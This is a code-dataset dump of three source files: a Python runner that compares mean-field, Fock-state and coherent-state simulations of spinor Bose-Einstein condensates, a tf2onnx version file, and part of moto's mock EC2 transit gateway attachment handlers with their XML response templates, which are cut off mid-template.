|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
SimulationRunner.py
|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
SimulationRunner.py
|
ZachGlassman/SpinorBECSimulation
|
8821a8bc150eda2aa36ce6b39ff178a3ddc99df1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Simulation Runner - This is a module containing a unified interface
into the 3 simulation types written. It should be the primary way to interact
with the simulation codes. It will allow easy comparison of results.
Three types of codes and requirements
Mean Field:
Number of atoms
number of samples (truncated wigner)
c
tfinal (simulation time)
pulses
qu0 (optional)
magnetic field
Fock State Full Quantum:
Number of atoms
c
mag_time(for magnetic field) not currently implemented
tauB(magnetic field decay) not currently implemented
dt (timestep)
magnetic field
Coherent State full Quantum:
Number of Atoms
magnetic field
magnetization
magnetic_field range loop
atom_range loop
spinor_phase
n_0
c (list)
delta_t (list)
ndiv (list)
emw (list)
n_step (list)
It will provide a unified plotting interface and variable interface
@author: Zachary Glassman
"""
# uncomment if using only terminal access
#import matplotlib
# matplotlib.use('Agg')
import os
import time as time_mod
import configparser
import argparse
from numpy.lib import scimath
import numpy as np
import matplotlib.pyplot as plt
from SpinorBECSimulation.MeanField.MeanFieldSimulation import single_simulation as mean_sim
from SpinorBECSimulation.FullQuantumFock.FockStateSimulation import fock_sim
from SpinorBECSimulation.CoherentStateChebyshev.spinorf import solve_system as cheby_sim_s
from SpinorBECSimulation.CoherentStateChebyshev.spinorf_multicore import solve_system as cheby_sim_p
try:
import colorama
except ImportError:
pass
#parallel or serial
#cheby_sim = cheby_sim_p
cheby_sim = cheby_sim_s
def color_text(text, color):
"""Function color text
    :param text: text to color
    :type text: string
:param color: color
:type color: string
"""
try:
return getattr(colorama.Fore, color) + text + colorama.Style.RESET_ALL
except:
return text
class SimulationResult(object):
"""class to hold results so we can parse different simulation into
equivalent results"""
def __init__(self, time, rho_0, std, color, name, init_norm=None):
self.t = time
self.rho = rho_0
self.std = std
self.name = name
self.col = color
self.q = False
self.init_norm = init_norm
self.plot_label =os.path.basename(self.name)
def plot(self, ax):
"""plot given axis ax"""
ax.fill_between(self.t, self.rho - self.std, self.rho +
self.std, color=self.col, alpha=.2)
ax.plot(self.t, self.rho, label=self.name, color=self.col)
def plot_ryan(self, ax):
ax.plot(self.t, self.rho, label=self.plot_label, color=self.col)
ax.plot(self.t, self.std, label=self.plot_label +
'std', color=self.col, linestyle='--')
def plot_no_color(self, ax, col):
ax.plot(self.t, self.rho, label=self.plot_label, color=col)
ax.plot(self.t, self.std, label=self.plot_label +
'std', color=col, linestyle='--')
def save(self, name):
"""function to save results to file"""
filename = '{0}_{1}_results.txt'.format(self.name, name)
try:
with open(filename, 'w') as f:
f.write('{0:10}{1:10}{2:10}{3:10}\n'.format(
'Time', 'Mean', 'STD', 'NORM'))
for i, time in enumerate(self.t):
f.write('{:<20.8f}{:<20.8f}{:<20.8f}{:<20.8f}\n'.format(
time, self.rho[i], self.std[i], self.init_norm[i]))
except:
with open(filename, 'w') as f:
f.write('{0:10}{1:10}{2:10}\n'.format('Time', 'Mean', 'STD'))
for i, time in enumerate(self.t):
f.write('{:<20.8f}{:<20.8f}{:<20.8f}\n'.format(
time, self.rho[i], self.std[i]))
def print_information(self):
print(self.t)
print(self.rho)
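# q_to_b below inverts the quadratic Zeeman relation; the 277 is assumed to be
# the ~277 Hz/G^2 coefficient for sodium, and the 2*pi factors convert between
# ordinary and angular frequency, so the expression simplifies to
# B = sqrt(2*pi*q / 277).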
def q_to_b(q):
return scimath.sqrt(q / 277 * (2 * np.pi)**3) / (2 * np.pi)
class Simulation(object):
"""Simulation Class is a simulation for a certain set of parameters
Will automatically use correct factors to compare to real vales"""
def __init__(self, name, savepath, pulses=[], number=False):
"""Inititalize name and all possible parameters set to reasonable values"""
self.name = name
self.savepath = savepath
self.params = {
'n': 5000,
'c': 24,
'n_samps': 200,
'magnetic_field': 27,
'atom_range': 20,
'mag_range': 20,
'spinor_phase': 0,
'n0': 4998,
'n1': 0,
'nm1': 0,
'time_step': 0.001e-3,
'tauB': 1e-3,
'total_time': .01,
'mag_time': 0.015,
'mag': 0,
}
self.pulses = pulses
self.number = number
self.fock = False
self.mean = False
self.cheby = False
self.verbose = False
def transform_q(self):
self.params['magnetic_field'] = q_to_b(self.params['q'])
def run_fock(self):
"""run a fock simulation with the current parameters"""
if self.verbose:
print(color_text('Running Fock State Simulation', 'CYAN'))
ts = time_mod.time()
npairs = int(self.params['n1'])
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
time, n0, n0var, init_norm = fock_sim(self.params['total_time'],
self.params['time_step'],
self.params['mag_time'],
self.params['tauB'],
N,
self.params['c'] * 2 * np.pi,
self.params['magnetic_field'],
npairs)
std = np.sqrt(n0var)
if not self.number:
n0 = n0 / N
std = std / N
self.fock_res = SimulationResult(
time, n0, std, 'red', os.path.join(self.savepath,'Fock'), init_norm=init_norm)
self.fock = True
if self.verbose:
te = time_mod.time()
print(color_text('Finished Fock State Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def run_mean(self):
"""run a mean field simulation with the current parameters"""
if self.verbose:
print(color_text('Running Mean Field Simulation', 'YELLOW'))
ts = time_mod.time()
time, mean, std, mw = mean_sim(int(self.params['n1']),
int(self.params['n0']),
int(self.params['nm1']),
self.params['spinor_phase'],
int(self.params['n_samps']),
self.params['c'] * 2 * np.pi,
self.params['total_time'] + .05 *
self.params['total_time'],
self.params['magnetic_field'],
self.pulses,
qu0=0)
if self.number:
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
mean = mean * N
std = std * N
self.mean_res = SimulationResult(time, mean, std, 'blue', os.path.join(self.savepath,'Mean'))
self.mean = True
if self.verbose:
te = time_mod.time()
print(color_text('Finished Mean Field Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def run_cheby(self, save=False):
"""run a chebyshev simulation with the current paramters"""
if self.verbose:
print(color_text('Running Coherent Simulation', 'MAGENTA'))
ts = time_mod.time()
if self.pulses == []:
dt = .001
c = [self.params['c']]
emw = [0]
mag_field = self.params['magnetic_field'] * \
100 / np.sqrt(2 * np.pi)
n_step = [int(self.params['total_time'] / dt)]
ndiv = 1
delta_t = [self.params['total_time']]
else:
dt = [.001, .0001, .001]
c = self.params['c']
ndiv = len(c)
emw = self.params['q']
mag_field = 0
n_step = [int(self.params['total_time'][i] / dt[i])
for i in range(len(dt))]
delta_t = [i for i in self.params['total_time']]
N = self.params['n0'] + self.params['n1'] + self.params['nm1']
sum_of_means, sum_of_meansq, norm, time = cheby_sim(mag_field,
int(N),
int(self.params['mag']),
int(self.params['mag_range']),
int(self.params['atom_range']),
self.params['spinor_phase'],
int(self.params['n0']),
ndiv,
delta_t,
c,
emw,
n_step)
mean = sum_of_means / norm
meansq = sum_of_meansq / norm
std = np.sqrt(meansq - mean * mean)
self.cheby = True
name_ = os.path.join(self.savepath, 'Coherent')
if self.number:
self.cheby_res = SimulationResult(
time, mean, std, 'green', name_)
else:
self.cheby_res = SimulationResult(
time, mean / N, std / N, 'green', name_)
if self.verbose:
te = time_mod.time()
print('\n', color_text('Finished Coherent Simulation', 'RED'))
print('Execution Time: {0:>4.2f}'.format(te - ts))
def plot(self, col=False, region=False):
        if not self._has_result():
            print('Cannot plot with no simulation')
            return
if col != False:
ax = plt.gca()
if self.fock:
self.fock_res.plot_no_color(ax, col=col)
if self.mean:
self.mean_res.plot_no_color(ax, col=col)
if self.cheby:
self.cheby_res.plot_no_color(ax, col=col)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
elif region == True:
fig, ax = plt.subplots()
if self.fock:
self.fock_res.plot(ax)
if self.mean:
self.mean_res.plot(ax)
if self.cheby:
self.cheby_res.plot(ax)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
else:
fig, ax = plt.subplots()
if self.fock:
self.fock_res.plot_ryan(ax)
if self.mean:
self.mean_res.plot_ryan(ax)
if self.cheby:
self.cheby_res.plot_ryan(ax)
ax.set_xlabel('t (s)')
if self.number:
ax.set_ylabel(r'$N_{m_F=0}$')
else:
ax.set_ylabel(r'$\rho_0$')
ax.legend()
def _has_result(self):
if self.fock or self.mean or self.cheby:
return True
else:
return False
def _reset(self):
self.cheby = False
self.mean = False
self.fock = False
def single_simulation(config, args):
    # keys for the configuration file
sims = 'Simulation Settings'
gsp = 'Global Simulation Parameters'
tw = 'TW Parameters'
fsp = 'Fock Simulation Parameters'
cscp = 'Coherent State Chebyshev Parameters'
# create simulation objects
name = config[sims].get('Name', 'sim')
savepath = config[sims].get("Savepath",'')
s = Simulation(name, savepath)
if args.verbose == True:
s.verbose = True
# loop through each one
print('Parameter Settings:')
for con in [config[gsp], config[tw], config[fsp], config[cscp]]:
for key in con:
s.params[key] = float(con[key])
if args.verbose == True:
print(' {0:<15} set to {1}'.format(key, con[key]))
# now check for q or magnetic field
    if s.params.get('q'):
s.q = True
        # now mock the magnetic field such that we get q
s.transform_q()
print(s.params['magnetic_field'])
# now run simulations
if args.verbose == True:
print(''.join('#' for i in range(20)))
print('Simulations Set Up - Starting Numerics')
ts = time_mod.time()
s.number = True
if config[sims].getboolean('run_coherent', False):
s.run_cheby()
if config[sims].getboolean('save', False):
s.cheby_res.save(name)
if config[sims].getboolean('run_fock', False):
s.run_fock()
if config[sims].getboolean('save', False):
s.fock_res.save(name)
if config[sims].getboolean('run_tw', False):
s.run_mean()
if config[sims].getboolean('save', False):
s.mean_res.save(name)
te = time_mod.time()
if args.verbose == True:
mins, secs = divmod(te - ts, 60)
hours, mins = divmod(mins, 60)
print(''.join('#' for i in range(20)))
out_form = 'Total Sim Time {0:02.0f}h:{1:02.0f}m:{2:02.2f}s'
print(out_form.format(hours, mins, secs))
if config[sims].getboolean('plot', True):
s.plot()
print('Saving Figure', '{0}_plot.pdf'.format(s.name))
plt.savefig('{0}_plot.pdf'.format(os.path.join(savepath, s.name)))
plt.show()
if args.verbose == True:
print(''.join('#' for i in range(20)))
print('Simulation Complete')
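# Example configuration file (illustrative sketch): the section names and the
# Name/Savepath/run_*/save/plot keys are the ones read above, while the numeric
# keys and values are assumptions based on Simulation.params defaults.
#
#   [Simulation Settings]
#   Name = example_run
#   Savepath = ./results
#   run_tw = yes
#   run_fock = no
#   run_coherent = no
#   save = yes
#   plot = yes
#   [Global Simulation Parameters]
#   q = 5
#   c = 24
#   n0 = 4998
#   n1 = 1
#   nm1 = 1
#   total_time = 0.01
#   [TW Parameters]
#   n_samps = 200
#   [Fock Simulation Parameters]
#   time_step = 0.000001
#   [Coherent State Chebyshev Parameters]
#   mag = 0
#   mag_range = 20
#   atom_range = 20
#   spinor_phase = 0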
def main(config, args):
single_simulation(config, args)
    # Should write a function where input is not from a config file
if __name__ == '__main__':
# add parser
parser = argparse.ArgumentParser()
parser.add_argument('-v',
dest='verbose',
action='store',
default=True,
help='verbose output (default True)')
parser.add_argument('-c',
dest='config',
action='store',
help='Path to config file',
required=True)
args = parser.parse_args()
# get configuration
config = configparser.ConfigParser()
config.read(args.config)
main(config, args)
| 35.655012
| 101
| 0.514514
|
d5da3ce71f85c40361761a61cce153c79bd0055d
| 75
|
py
|
Python
|
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
tf2onnx/version.py
|
natke/tensorflow-onnx
|
af083a2e070d67b7ca47e9babe7ff6938b169176
|
[
"MIT"
] | null | null | null |
version = '1.6.0'
git_version = '82f805f8fe7d2fa91e6ca9d39e153712f6887fec'
| 25
| 56
| 0.813333
|
0b877c8c98cb7469d721036f57817191b8a06102
| 23,187
|
py
|
Python
|
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
moto/ec2/responses/transit_gateway_attachments.py
|
mts-engineering/moto
|
ee6f20e376a902ab38810ab41094fda96cbee65c
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from moto.core.responses import BaseResponse
from moto.ec2.utils import filters_from_querystring, add_tag_specification
class TransitGatewayAttachment(BaseResponse):
def create_transit_gateway_vpc_attachment(self):
options = self._get_multi_param_dict("Options")
subnet_ids = self._get_multi_param("SubnetIds")
transit_gateway_id = self._get_param("TransitGatewayId")
vpc_id = self._get_param("VpcId")
tags = self._get_multi_param("TagSpecifications")
tags = tags[0] if isinstance(tags, list) and len(tags) == 1 else tags
tags = (tags or {}).get("Tag", [])
tags = {t["Key"]: t["Value"] for t in tags}
transit_gateway_attachment = self.ec2_backend.create_transit_gateway_vpc_attachment(
transit_gateway_id=transit_gateway_id,
tags=tags,
vpc_id=vpc_id,
subnet_ids=subnet_ids,
options=options,
)
template = self.response_template(CREATE_TRANSIT_GATEWAY_VPC_ATTACHMENT)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def describe_transit_gateway_vpc_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_vpc_attachments = self.ec2_backend.describe_transit_gateway_vpc_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(
transit_gateway_vpc_attachments=transit_gateway_vpc_attachments
)
def modify_transit_gateway_vpc_attachment(self):
add_subnet_ids = self._get_multi_param("AddSubnetIds")
options = self._get_multi_param_dict("Options")
remove_subnet_ids = self._get_multi_param("RemoveSubnetIds")
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_attachment = self.ec2_backend.modify_transit_gateway_vpc_attachment(
add_subnet_ids=add_subnet_ids,
options=options,
remove_subnet_ids=remove_subnet_ids,
transit_gateway_attachment_id=transit_gateway_attachment_id,
)
template = self.response_template(MODIFY_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def describe_transit_gateway_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_attachments = self.ec2_backend.describe_transit_gateway_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_ATTACHMENTS)
return template.render(transit_gateway_attachments=transit_gateway_attachments)
def delete_transit_gateway_vpc_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_attachment = self.ec2_backend.delete_transit_gateway_vpc_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(DELETE_TRANSIT_GATEWAY_VPC_ATTACHMENTS)
return template.render(transit_gateway_attachment=transit_gateway_attachment)
def associate_transit_gateway_route_table(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_association = self.ec2_backend.associate_transit_gateway_route_table(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_ASSOCIATION)
return template.render(transit_gateway_association=transit_gateway_association)
def enable_transit_gateway_route_table_propagation(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_propagation = self.ec2_backend.enable_transit_gateway_route_table_propagation(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_PROPAGATION)
return template.render(transit_gateway_propagation=transit_gateway_propagation)
def disable_transit_gateway_route_table_propagation(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_route_table_id = self._get_param("TransitGatewayRouteTableId")
transit_gateway_propagation = self.ec2_backend.disable_transit_gateway_route_table_propagation(
transit_gateway_attachment_id=transit_gateway_attachment_id,
transit_gateway_route_table_id=transit_gateway_route_table_id,
)
template = self.response_template(TRANSIT_GATEWAY_PROPAGATION)
return template.render(transit_gateway_propagation=transit_gateway_propagation)
def create_transit_gateway_peering_attachment(self):
peer_account_id = self._get_param("PeerAccountId")
peer_region = self._get_param("PeerRegion")
peer_transit_gateway_id = self._get_param("PeerTransitGatewayId")
transit_gateway_id = self._get_param("TransitGatewayId")
tags = add_tag_specification(self._get_multi_param("TagSpecification"))
transit_gateway_peering_attachment = self.ec2_backend.create_transit_gateway_peering_attachment(
transit_gateway_id,
peer_transit_gateway_id,
peer_region,
peer_account_id,
tags,
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="CreateTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def describe_transit_gateway_peering_attachments(self):
transit_gateways_attachment_ids = self._get_multi_param(
"TransitGatewayAttachmentIds"
)
filters = filters_from_querystring(self.querystring)
max_results = self._get_param("MaxResults")
transit_gateway_peering_attachments = self.ec2_backend.describe_transit_gateway_peering_attachments(
transit_gateways_attachment_ids=transit_gateways_attachment_ids,
filters=filters,
max_results=max_results,
)
template = self.response_template(DESCRIBE_TRANSIT_GATEWAY_PEERING_ATTACHMENTS)
return template.render(
transit_gateway_peering_attachments=transit_gateway_peering_attachments
)
def accept_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.accept_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="AcceptTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def delete_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.delete_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="DeleteTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
def reject_transit_gateway_peering_attachment(self):
transit_gateway_attachment_id = self._get_param("TransitGatewayAttachmentId")
transit_gateway_peering_attachment = self.ec2_backend.reject_transit_gateway_peering_attachment(
transit_gateway_attachment_id=transit_gateway_attachment_id
)
template = self.response_template(TRANSIT_GATEWAY_PEERING_ATTACHMENT)
return template.render(
method_name="RejectTransitGatewayPeeringAttachment",
transit_gateway_peering_attachment=transit_gateway_peering_attachment,
)
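# Usage sketch (illustrative, not part of this module): with moto's EC2 mock
# active, a plain boto3 client drives the handlers above; the calls and response
# keys below are the standard EC2 API ones and the values are placeholders.
#
#   import boto3
#   from moto import mock_ec2
#
#   @mock_ec2
#   def demo():
#       ec2 = boto3.client("ec2", region_name="us-east-1")
#       tgw_id = ec2.create_transit_gateway()["TransitGateway"]["TransitGatewayId"]
#       vpc_id = ec2.create_vpc(CidrBlock="10.0.0.0/16")["Vpc"]["VpcId"]
#       subnet = ec2.create_subnet(VpcId=vpc_id, CidrBlock="10.0.1.0/24")["Subnet"]["SubnetId"]
#       att = ec2.create_transit_gateway_vpc_attachment(
#           TransitGatewayId=tgw_id, VpcId=vpc_id, SubnetIds=[subnet])
#       return att["TransitGatewayVpcAttachment"]["TransitGatewayAttachmentId"]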
CREATE_TRANSIT_GATEWAY_VPC_ATTACHMENT = """<CreateTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</CreateTransitGatewayVpcAttachmentResponse>"""
DESCRIBE_TRANSIT_GATEWAY_ATTACHMENTS = """<DescribeTransitGatewayAttachmentsResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>92aa7885-74c0-42d1-a846-e59bd07488a7</requestId>
<transitGatewayAttachments>
{% for transit_gateway_attachment in transit_gateway_attachments %}
<item>
<association>
<state>associated</state>
<transitGatewayRouteTableId>tgw-rtb-0b36edb9b88f0d5e3</transitGatewayRouteTableId>
</association>
<creationTime>2021-07-18T08:57:21.000Z</creationTime>
<resourceId>{{ transit_gateway_attachment.resource_id }}</resourceId>
<resourceOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</resourceOwnerId>
<resourceType>{{ transit_gateway_attachment.resource_type }}</resourceType>
<state>{{ transit_gateway_attachment.state }}</state>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<transitGatewayOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</transitGatewayOwnerId>
</item>
{% endfor %}
</transitGatewayAttachments>
</DescribeTransitGatewayAttachmentsResponse>
"""
DESCRIBE_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<DescribeTransitGatewayVpcAttachmentsResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>bebc9670-0205-4f28-ad89-049c97e46633</requestId>
<transitGatewayVpcAttachments>
{% for transit_gateway_vpc_attachment in transit_gateway_vpc_attachments %}
<item>
<creationTime>2021-07-18T08:57:21.000Z</creationTime>
<options>
<applianceModeSupport>{{ transit_gateway_vpc_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_vpc_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_vpc_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_vpc_attachment.state }}</state>
<subnetIds>
{% for id in transit_gateway_vpc_attachment.subnet_ids %}
<item>{{ id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_vpc_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_vpc_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_vpc_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_vpc_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_vpc_attachment.resource_owner_id }}</vpcOwnerId>
</item>
{% endfor %}
</transitGatewayVpcAttachments>
</DescribeTransitGatewayVpcAttachmentsResponse>
"""
MODIFY_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<ModifyTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</ModifyTransitGatewayVpcAttachmentResponse>"""
DELETE_TRANSIT_GATEWAY_VPC_ATTACHMENTS = """<DeleteTransitGatewayVpcAttachmentResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayVpcAttachment>
<createTime>{{ transit_gateway_attachment.create_time }}</createTime>
<options>
<applianceModeSupport>{{ transit_gateway_attachment.options.ApplianceModeSupport }}</applianceModeSupport>
<dnsSupport>{{ transit_gateway_attachment.options.DnsSupport }}</dnsSupport>
<ipv6Support>{{ transit_gateway_attachment.options.Ipv6Support }}</ipv6Support>
</options>
<state>{{ transit_gateway_attachment.state }}</state>
<subnetIds>
{% for subnet_id in transit_gateway_attachment.subnet_ids %}
<item>{{ subnet_id }}</item>
{% endfor %}
</subnetIds>
<tagSet>
{% for tag in transit_gateway_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_attachment.id }}</transitGatewayAttachmentId>
<transitGatewayId>{{ transit_gateway_attachment.transit_gateway_id }}</transitGatewayId>
<vpcId>{{ transit_gateway_attachment.vpc_id }}</vpcId>
<vpcOwnerId>{{ transit_gateway_attachment.resource_owner_id }}</vpcOwnerId>
</transitGatewayVpcAttachment>
</DeleteTransitGatewayVpcAttachmentResponse>"""
TRANSIT_GATEWAY_ASSOCIATION = """<AssociateTransitGatewayRouteTableResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>86a597cf-93ec-44a3-9559-4641863642a5</requestId>
<association>
<resourceId>{{ transit_gateway_association.resource_id }}</resourceId>
<resourceType>{{ transit_gateway_association.resource_type }}</resourceType>
<state>{{ transit_gateway_association.state }}</state>
<transitGatewayAttachmentId>{{ transit_gateway_association.transit_gateway_attachment_id }}</transitGatewayAttachmentId>
<transitGatewayRouteTableId>{{ transit_gateway_association.transit_gateway_route_table_id }}</transitGatewayRouteTableId>
</association>
</AssociateTransitGatewayRouteTableResponse>
"""
TRANSIT_GATEWAY_PROPAGATION = """<EnableTransitGatewayRouteTablePropagationResponse xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>c78427d4-e498-46ae-bc14-32841b16bff4</requestId>
<propagation>
<resourceId>{{ transit_gateway_propagation.resource_id }}</resourceId>
<resourceType>{{ transit_gateway_propagation.resource_type }}</resourceType>
<state>{{ transit_gateway_propagation.state }}</state>
<transitGatewayAttachmentId>{{ transit_gateway_propagation.transit_gateway_attachment_id }}</transitGatewayAttachmentId>
<transitGatewayRouteTableId>{{ transit_gateway_propagation.transit_gateway_route_table_id }}</transitGatewayRouteTableId>
</propagation>
</EnableTransitGatewayRouteTablePropagationResponse>
"""
TRANSIT_GATEWAY_PEERING_ATTACHMENT = """<{{ method_name }} xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>9b5766ac-2af6-4b92-9a8a-4d74ae46ae79</requestId>
<transitGatewayPeeringAttachment>
<createTime>{{ transit_gateway_peering_attachment.create_time }}</createTime>
<state>{{ transit_gateway_peering_attachment.state }}</state>
<accepterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.accepter_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.accepter_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.accepter_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</accepterTgwInfo>
<requesterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.requester_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.requester_tgw_info.region or '' }}</region>
